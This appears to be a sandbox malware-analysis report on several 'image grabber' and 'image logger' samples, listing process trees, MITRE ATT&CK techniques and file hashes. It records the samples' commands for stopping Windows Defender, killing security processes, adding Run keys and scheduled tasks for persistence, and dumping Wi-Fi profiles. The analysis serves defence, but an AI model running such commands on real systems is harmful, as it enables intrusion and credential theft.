  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4500
- C:\Users\Admin\Downloads\Image_Grabber Made by Flow $ Aether.exe
  "C:\Users\Admin\Downloads\Image_Grabber Made by Flow $ Aether.exe"
  2⤵
  - Looks for VirtualBox Guest Additions in registry
  - Looks for VMWare Tools registry key
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Maps connected drives based on registry
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5660 /prefetch:8
  2⤵
  PID:4580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
  2⤵
  PID:4556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7036 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5388 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7044 /prefetch:1
  2⤵
  PID:3660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:1
  2⤵
  PID:3512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5468 /prefetch:8
  2⤵
  PID:4292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:1
  2⤵
  PID:3168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7532 /prefetch:1
  2⤵
  PID:3868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8108 /prefetch:1
  2⤵
  PID:4192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7664 /prefetch:8
  2⤵
  PID:4604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7752 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7916 /prefetch:1
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,16727375310771125706,17276634439058460305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7928 /prefetch:8
  2⤵
  PID:5100

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4796

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:856

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Image Grabber.rar"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:220
- C:\Users\Admin\AppData\Local\Temp\7zOCD02306C\image grabber.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOCD02306C\image grabber.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3960
- - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\GRABBER.EXE
    "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\GRABBER.EXE"
    3⤵
    - Executes dropped EXE
    PID:3648
- - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMAGE LOGGER.EXE
    "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMAGE LOGGER.EXE"
    3⤵
    - Executes dropped EXE
    PID:4816
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMAGE LOGGER.EXE
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMAGE LOGGER.EXE"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4700
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2908
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c title xyz
        5⤵
        
        PID:696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\LOL.BAT" "
    3⤵
    - Checks computer location settings
    - Modifies registry class
    PID:4796
  - - C:\Windows\SysWOW64\net.exe
      net stop"WinDefend"
      4⤵
      PID:4976
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop"WinDefend"
        5⤵
        
        PID:4684
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /t /im "MSASCui.exe"
      4⤵
      Kills process with taskkill
      PID:2848
  - - C:\Windows\SysWOW64\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\LOL.BAT" /f
      4⤵
      Adds Run key to start application
      PID:2648
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zOCD02306C\XD.vbs"
      4⤵
      PID:4000

C:\Users\Admin\Downloads\Image_Grabber Made by Flow $ Aether.exe
"C:\Users\Admin\Downloads\Image_Grabber Made by Flow $ Aether.exe"
1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3692

C:\Users\Admin\Downloads\Setup.py.exe
"C:\Users\Admin\Downloads\Setup.py.exe"
1⤵
- Executes dropped EXE
PID:4740
- C:\Users\Admin\Downloads\Setup.py.exe
  "C:\Users\Admin\Downloads\Setup.py.exe"
  2⤵
  - Executes dropped EXE
  PID:1120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:4292

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\alta grabber (1).rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1612
- C:\Users\Admin\AppData\Local\Temp\7zOC4601D8D\Grebber image.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC4601D8D\Grebber image.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:4864
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Windows Updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:996
- - C:\Windows\system32\SubDir\Client.exe
    "C:\Windows\system32\SubDir\Client.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:5040
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows Updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:4508

C:\Users\Admin\Downloads\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger.exe
"C:\Users\Admin\Downloads\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger.exe"
1⤵
PID:4368
- C:\Users\Admin\Downloads\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger.exe
  "C:\Users\Admin\Downloads\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger\Glx-Image-Logger.exe"
  2⤵
  - Drops startup file
  PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
    3⤵
    PID:4284
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:988
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3884
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
    3⤵
    PID:4620
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
      4⤵
      PID:3828

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\IMAGE-TOKEN-LOGGER.rar"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4328
- C:\Users\Admin\AppData\Local\Temp\7zO8E02208F\IMAGE LOGGER.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO8E02208F\IMAGE LOGGER.exe"
  2⤵
  PID:2732
- - C:\Users\Admin\AppData\Local\Temp\7zO8E02208F\IMAGE LOGGER.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO8E02208F\IMAGE LOGGER.exe"
    3⤵
    PID:1232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:4956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:3660
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:4284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
      4⤵
      PID:1032
    - - C:\Windows\system32\reg.exe
        
        reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
        5⤵
        Modifies registry key
        
        PID:2440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
      4⤵
      PID:3932
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:8
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:1016
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:4508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:1208
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:2068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
      4⤵
      PID:4808
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        5⤵
        
        PID:412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      PID:3772
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:4508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      PID:3640
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:3668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      PID:2436
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:2216
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO8E01A2BF\xgrabb.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Windows Management Instrumentation

T1047

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\GRABBER.EXE

Filesize
140KB

MD5
d8a776348b63fd6d8df4a8c6e94c60d7

SHA1
3bb173d4097bec73a58558aa954e322704c90363

SHA256
88dea99636204335f5dbb9c70965d68ad99faa56af18dd618b97358c8bfd8aca

SHA512
d15149b06a35c2ed930397f249d0bf33b53b477d75024925a2cbe6ffa3e2913d5a3a34ecb452d8505a3adf8a4dad5d8de5fd40e62b197cb2bf25e4c81bb776a5

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\IMAGE LOGGER.EXE

Filesize
14.2MB

MD5
2f16688544cef3e2f408351bf83482e8

SHA1
8d6056e029876c7cbee46e2c36ca6042c9ff07ff

SHA256
7275073b3139f2f512533a6ef060497ca57be41e807c906c9e5724d4cdc90101

SHA512
13da72cf923f22891dcb752da8fe7b504f4cd9dfebd97bc1a1ed16303d73d03eab9536c83e108a6cdba4b1f98ba9d36e5e5e189018e8b549f257e94e5e96d5d4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\LOL.BAT

Filesize
256B

MD5
63a8d4832194895037e912648b21dd7e

SHA1
4f7c6dc63b3189387e11e0e83461f72f73ec8efb

SHA256
2019bcc66d0c119fde0cf62200d1285d7752e91a39bbb2f29ecacc4864860ea3

SHA512
9206b55dfcb5fffe59766a0c2ad3c82086dbfcd56dd757f1c09dbd03e8caf8f1beddb1c89d64c5b3771c67724817ce129d8d761cac9f3c42d8c243d84982ded8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a8e767fd33edd97d306efb6905f93252

SHA1
a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

SHA256
c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

SHA512
07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5972f2b4a2012efd0d2dc230074abd33

SHA1
3425bc896219214ef3bc48f167760ac828f9f79e

SHA256
0b55c9de70d444000cb6d0c9117a9fe7af2beb0654e2aa2a8ccf2ddf7ada84bf

SHA512
71fe4271bea939055dda814c49e5384994f03aac4b2d08cd4ef24c29b89d4c4df964f3b2139ac570bc8acb475d4abdd920da444c7286713f83d9376069c53f9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
25643af4c3bf597ea316f3e0c9f6d27f

SHA1
b863bd684e9ee958367c338510ce5ef75dd192d5

SHA256
3a49dc590224c34dfa3a4230a077804671d9b6b0f8d3f429bb5defd29c02c84b

SHA512
6e7e1b838ad3db3189f424fe91a58df4f5ef0e2389dc50173c59785a3054537042224d1c286b450426b8b5ad1ddbf349fd9f82e33a08b2331255bdc0ed276851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
439b5e04ca18c7fb02cf406e6eb24167

SHA1
e0c5bb6216903934726e3570b7d63295b9d28987

SHA256
247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

SHA512
d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
24KB

MD5
6165a7c774d104653fee619b4ea77fdc

SHA1
214fe3e58449f886e78f2a101844acead3502236

SHA256
e6cbb4d443cab3632935bc1284e7691409e4a17d5e67c8b401b831c8dedcd773

SHA512
0d95446139983a568f9cd3d18f12eca05fca44257c6644d6e894a13d94e654a2c19accdb5baa4c513a69bd3ec97dbccd143f1290915f13c5c39d0fab478f1034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
48KB

MD5
675c3cc9eeb511d43db6635bf1b515f9

SHA1
b5a3bc916093bf35af9cb26f45f79c229db4d70b

SHA256
827caf07904c9ca524acf5d97bcaf1f11c84ffdb1fc2e7f683e1dc80648ed58c

SHA512
6e82a416ca6d79ed2402382326d8621d9828b420daad5ff0a93f2de13598213b52ed7fc9f6a59dc6bb71bfb6a1bb13be3d54581e2d26ecb0dbf0bb2ecc894197

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
43KB

MD5
46b6ef2093b07b6333a72ab5113b6452

SHA1
566e4accbc76afb673614f4c8b0c2ffe281e89fd

SHA256
51be6ba8611f6a3bf95002fba48da012cd9559e0667ff19176a08150e429aa9e

SHA512
b19712a582fbb03f57ec1c91e28403076fd7aedf6c7b64cd255b3ea6cfd806df919423da236fd78aa39e78b5f4ef567e41c5d56002bccdc9338857d64cb24ae7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
23KB

MD5
ec52a780fb628756883539d1daf3f68f

SHA1
cbfa20c69acbb5b75a16c81d12127be1ebcd47ae

SHA256
4db0f4e2991abbcf13c1fa0094672e2b3f453797e271a846a0eb3b4ffd6ebfce

SHA512
5191b287f7d15d882ced2bba912a327c351a29dfc4b457172f3f5886b60eb6d7683c6ca51c9734cc0385da9514d271d674313c049db5b0adec1b05a1a1ca29fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
20KB

MD5
8b2813296f6e3577e9ac2eb518ac437e

SHA1
6c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86

SHA256
befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d

SHA512
a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
21KB

MD5
b06fa3dfc52a8b8307d2b0cbc039a5bb

SHA1
26588a72932890663c6316230f630e52f5038fc9

SHA256
2ceb1cfc5718d43f62baa9b802554f79e4029384a625c01eada3c508a3c518ec

SHA512
271e62ea541a0b17c1e52dd79bfdfc35641abe1750013daa237441e2751839edfccde0e42f6f67235989d608dc27094c86c442c7c584248d0b9ad251edf57837

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
21KB

MD5
32c05a2648fa581b2fddb72595c036c4

SHA1
61ad89a62722501be68af6a4ce20dd260126095b

SHA256
0a525183f268409566c99e6217a87645908306df7dcda16a45adfdeab84ada50

SHA512
9fb37130d69df1439adb0ee4751b3ef8520fab2400abe2c3154933ff67f3b01b45802d7f6b7a14a0b4360509ff05d53dcde3b18534280eec21b4e4e31b7ec596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
65KB

MD5
9a21c78c3cfb129f395919dfb35bd678

SHA1
65e66cd7c7dbae0fa6f5346a1413414bae531d06

SHA256
f336b0f4882f58bcc4ffcea8aeb064c3f2999836ccb269eecc140bb401bbdf23

SHA512
8005c6594dd227e5dcd0e1a9dca2757c1e94ac1ee01f23f01130900f67382b5123b265ecd7f79ec01914ad8d8f743318fa2ba6fa70fa18a5597a9f492ccde04c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
59KB

MD5
c5daadbdbbf6860d51598ca4cd565fa2

SHA1
ddfdc115feae3b15e02e181d6a1a7e9bb835edad

SHA256
c5fa7f955f72a8ef31883517badb2e5d2a4909f708c9f8ab7b53e9ecfacb99c1

SHA512
020a2e14bdc6fe57215e8146659e42651192d2ee7485de71072cf042a7e865a782a9a37f9e288f471bbc4fd1d24346d1109452b5e08f35ec6b4f7b43bbbbec5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
81KB

MD5
21c02afc3645ed8d9a1b13e656f3aa2d

SHA1
720499fb1c219191a9890528bb6a1b4eefa1f873

SHA256
903d9bee1d2afabc2802371e65f778d6536da391257be2a007c1dd9bc1d2636f

SHA512
627b57fcdf47242adbc3fa5787b7f0ba00f212d6c212aeb22f364f8f3a2385ff172138f5e07eefe57fcbbc02dd641ba3d889bc4cb5507f586717900f878571cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
151KB

MD5
992b11ff67a7a85ac361af5fa7b7d128

SHA1
8f6e96ef72e6f8d187555f3336ce2fa74bccd9a7

SHA256
e98f893415bb4a9e2490327239132725245b2388853aa451e61545cd0fcd9c03

SHA512
df8fbd1abaa320a175389cd8a28b69713261eeaf5a3d6a743817923281eb756c2c600c5bfae7c352861ee85894845bd392801bf9356f92283da50a2936163ef8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
21KB

MD5
12b3b06a215a92b61047d4d676009d5c

SHA1
bfaffa1420406892f96c14563413c12b22d5578d

SHA256
ebddde1fdfe55665db44af96d9a914ea833d5c74b510150b0aafcc6598c8ec72

SHA512
5f597b93c1bd9e9be7d7aa42ec1a69d1183d164096046af276546f907c7796cd5d1ea80d152ac8cab76f1ddf3a6e3d51ed74c6dc97d467a4f5519dbad8d42ea8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
24KB

MD5
dffae597264123f497897e41c5769902

SHA1
cdf8614011681c3bb32a683b9b47639e73fd9667

SHA256
f6402c96a60f368920ba4fa44b6e0e6607d763d9e1ab2be04c7518cce9058a26

SHA512
